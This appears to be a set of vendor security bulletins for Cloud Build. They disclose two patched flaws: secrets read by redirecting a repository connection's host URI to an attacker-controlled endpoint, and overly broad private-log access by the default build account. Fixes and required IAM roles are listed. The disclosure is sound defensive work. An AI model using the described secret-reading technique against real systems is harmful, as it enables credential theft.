Security bulletins

When you create or update repository connections, Cloud Build uses Secret Manager secrets to authenticate to third-party Git providers. For GitLab Enterprise (GLE) and Bitbucket Data Center (BBDC) connections, these referenced secrets were previously retrieved by the Cloud Build service agent (P4SA) on your behalf. This meant that permission checks were performed against the P4SA's credentials rather than those of the calling principal. This could allow a principal with limited permissions to read referenced Secret Manager secrets by pointing the repository connection host URI to an attacker-controlled endpoint.

To mitigate this vulnerability and adhere to the security principle of least privilege, Cloud Build now checks permissions against both the calling principal's credentials (using end-user credentials) and the P4SA when calling repository connection APIs for GitLab Enterprise (GLE) and Bitbucket Data Center (BBDC) connections. Specifically, the server now verifies that both the caller and the P4SA possess the secretmanager.versions.access IAM permission on the referenced Secret Manager secrets.

What should I do?

No action is required for existing repository connections. If you encounter permission errors when creating or updating GitLab Enterprise (GLE) or Bitbucket Data Center (BBDC) repository connections, grant the Secret Manager Secret Accessor (roles/secretmanager.secretAccessor) role on the referenced secrets to the user or service account creating or updating the connections.

What vulnerabilities are addressed by this patch?

This vulnerability allowed users with repository connection administrator access to read referenced Secret Manager secrets because the permission checks were only performed against the P4SA's credentials. By requiring permission checks against both the calling principal (using end-user credentials) and the P4SA for GitLab Enterprise (GLE) and Bitbucket Data Center (BBDC) connections, only users authorized with the secretmanager.versions.access IAM permission on the secrets (in addition to the P4SA itself) can use them in repository connections.

When you enable the Cloud Build API in a project, Cloud Build automatically creates a default service account to execute builds on your behalf. This Cloud Build legacy service account previously had the logging.privateLogEntries.list IAM permission, which allowed the build to have access to list private logs by default. This permission has now been revoked from the Cloud Build service account to adhere to the security principle of least privilege.

What should I do?

No further user action is required. The logging.privateLogEntries.list IAM permission has been revoked from the Cloud Build legacy service account and the fix has been rolled out.

What vulnerabilities are addressed by this patch?

This vulnerability granted builds the permission to list private logs. Since the logging.privateLogEntries.list IAM permission has now been revoked from the Cloud Build legacy service account, builds no longer have access to list private logs by default.